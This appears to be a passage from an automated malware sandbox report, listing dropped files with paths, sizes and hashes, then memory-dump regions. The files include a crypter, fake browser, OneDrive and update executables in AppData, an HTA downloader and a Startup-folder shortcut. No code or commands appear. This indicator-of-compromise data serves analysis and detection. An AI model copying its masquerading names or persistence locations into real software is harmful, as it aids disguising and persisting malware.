a676234d426917535e174f85eabe4ef8b88256a5

SHA256
a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90

SHA512
747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9deb31d63c251368f1dcf297650b2997

SHA1
02a6835b82971ae7dba9d97e528412fac5247714

SHA256
9c598fb1420e5646126e8f7a42a3ea94b1050017e9cb67bbe6429f08c1bc2893

SHA512
0d6c8958a051b75f0d0a53e336954e102e642ad79a96f39fb1ed6643d77f9b54725b27eef460e33c89ff1d6136155cb6d873c25f9ae3dfc4a9d3a9346816477a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a4be454dcbec32af10161f739ec237fc

SHA1
44d5b3b34f92818563efeb37dc75442273cc2bf3

SHA256
4436e1add60e37baccc40f44b93b8ee2baf4261b5e3e45a834ba350ec9658f15

SHA512
a925de5c086cb81b50136d78dc7aea45f8205b57ae8b6219f3d00016b33ebec7e85d7630baf0c09ec2ed29a87c68f0cdefcfd21eb7e99a5679dc632cb725fc4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypters.exe

Filesize
5.0MB

MD5
d4d28f2c6fd9af9ee5a3be30f9ab913b

SHA1
be4264bceaff957ff799b73ebc2479f0fc794815

SHA256
c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e

SHA512
7eed5b6d3420c930a07aee500e086ec61fd33099cd641a2efe7664081c0e5fdab4d1ad2b4835edcbe3e6722d44e60a75119a2900cfd00b7c182b20f379d7a977

Download Submit
C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\msedge.exe

Filesize
165KB

MD5
8c92b315d88907a31ad9eaa934a60660

SHA1
89c26c8a1f5b2db85e628a6526c9431e7febe5f8

SHA256
bea75b57f940b13d5bfcb05a0c3ae1def9d2d25f6c3115fc7b2bf85232175672

SHA512
b294fd15ac63bbd7cfd444c9df5a03c7bce8bc98d2b2d2011e5290638fba689ff083260ed60688cc4b0a0a59299dda0b1cc09ba8f63daf92efbeeaed604ebfc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_egurmq00.c5f.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a9aeb7f2-845c-4462-91aa-5068e666964d.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir340_1172562660\5e9a18e9-61f9-4ae3-8559-918ac6548876.tmp

Filesize
150KB

MD5
14937b985303ecce4196154a24fc369a

SHA1
ecfe89e11a8d08ce0c8745ff5735d5edad683730

SHA256
71006a5311819fef45c659428944897184880bcdb571bf68c52b3d6ee97682ff

SHA512
1d03c75e4d2cd57eee7b0e93e2de293b41f280c415fb2446ac234fc5afd11fe2f2fcc8ab9843db0847c2ce6bd7df7213fcf249ea71896fbf6c0696e3f5aee46c

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir340_1172562660\CRX_INSTALL\_locales\en\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome Update.exe

Filesize
152KB

MD5
16cdd301591c6af35a03cd18caee2e59

SHA1
92c6575b57eac309c8664d4ac76d87f2906e8ef3

SHA256
11d55ac2f9070a70d12f760e9a6ee75136eca4bf711042acc25828ddda3582c8

SHA512
a44402e5e233cb983f7cfd9b81bc542a08d8092ffa4bd970fc25fe112355643506d5dfee0dd76f2e79b983df0fde67bfc50aabb477492a7596e38081e4083476

Download Submit
C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta

Filesize
844B

MD5
3f8a283abe6fe28a7d217c8105041426

SHA1
0283cd67e7cc0a99eeae3c3dea69716a6ac75bb1

SHA256
333c439c84ccbcab11dd9cc7f4d90596c5b65caf1164e8a908e61aa0222916b1

SHA512
bc5f8f256356c689953516877f8b7895fb1efe587feabdddf0e1524d0b22e3dcb89e0e654d19d0c314c6a376a0e7594965178a353d147ea98c43d3d5976f1846

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

Filesize
766B

MD5
8cb34e63ba16f8c77ba2677723c36be9

SHA1
a104fe7d65dd65edecec3cfbcf16f5377e023505

SHA256
e373eaf66cc6a1d5808c6fa0b0006ae3b366737403b100a6fae73db5a060cf68

SHA512
abd19e713c4ee2a8c8de0adb1ef6f488a04fb0c4b62d60607cb589c6144b9b8e661482b2bef1cc32743387e4d531d2f09f20fc8d0dbf53c8b23c30aa73eeb716

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
140KB

MD5
a1cd6f4a3a37ed83515aa4752f98eb1d

SHA1
7f787c8d72787d8d130b4788b006b799167d1802

SHA256
5cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65

SHA512
9489287e0b4925345fee05fe2f6e6f12440af1425ef397145e32e6f80c7ae98b530e42002d92dc156643f9829bc8a3b969e855cecd2265b6616c4514eed00355

Download Submit
C:\Users\Admin\AppData\Roaming\TOPHERC.exe

Filesize
4.2MB

MD5
79f2fd33a188ff47216b4f4dd4552582

SHA1
16e40e0a1fed903fec20cd6cd600e3a2548881ad

SHA256
cc45d38fa00c5aeb33bdf842166460117b5e70b0b4fcf5bb6ef9747ec0b0575f

SHA512
caa33702fdc7e480a6093d2af035f860044a4e960fd6e5a4b91d6019f2c3d4c235d9e95734e6b54ea2a88af4e96bf72a54d81b2a70c1f64e76dcd202891905f2

Download Submit
C:\Users\Admin\AppData\Roaming\msedge.exe

Filesize
166KB

MD5
aee20d80f94ae0885bb2cabadb78efc9

SHA1
1e82eba032fcb0b89e1fdf937a79133a5057d0a1

SHA256
498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d

SHA512
3a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42

Download Submit
memory/1424-127-0x00000216F6550000-0x00000216F6572000-memory.dmp

Filesize
136KB

Download
memory/1424-1-0x0000000000A20000-0x0000000000F56000-memory.dmp

Filesize
5.2MB

Download
memory/1424-0-0x00007FF9E0873000-0x00007FF9E0875000-memory.dmp

Filesize
8KB

Download
memory/1444-65-0x0000000000C70000-0x0000000000C9E000-memory.dmp

Filesize
184KB

Download
memory/2588-13-0x00000000000F0000-0x000000000011E000-memory.dmp

Filesize
184KB

Download
memory/2588-285-0x00007FF9E0870000-0x00007FF9E1332000-memory.dmp

Filesize
10.8MB

Download
memory/2588-22-0x00007FF9E0870000-0x00007FF9E1332000-memory.dmp

Filesize
10.8MB

Download
memory/2588-356-0x00007FF9E0870000-0x00007FF9E1332000-memory.dmp

Filesize
10.8MB

Download
memory/3340-68-0x00000000002B0000-0x00000000002D8000-memory.dmp

Filesize
160KB

Download
memory/3448-85-0x00007FF9E0870000-0x00007FF9E1332000-memory.dmp

Filesize
10.8MB

Download
memory/3448-27-0x0000000000440000-0x0000000000948000-memory.dmp

Filesize
5.0MB

Download
memory/3448-28-0x00007FF9E0870000-0x00007FF9E1332000-memory.dmp

Filesize
10.8MB

Download
memory/3572-43-0x0000000000410000-0x000000000043C000-memory.dmp

Filesize
176KB

Download
memory/4900-86-0x0000000000920000-0x0000000000D58000-memory.dmp

Filesize
4.2MB

Download
memory/4900-87-0x0000000005E20000-0x00000000063C6000-memory.dmp

Filesize
5.6MB

Download
memory/4900-92-0x0000000005870000-0x000000000590C000-memory.dmp

Filesize
624KB

Download
memory/4900-88-0x00000000056C0000-0x0000000005752000-memory.dmp

Filesize
584KB

Download
memory/4900-94-0x0000000003260000-0x000000000326A000-memory.dmp

Filesize
40KB

Download
memory/4900-592-0x000000000D180000-0x000000000D4BB000-memory.dmp

Filesize
3.2MB

Download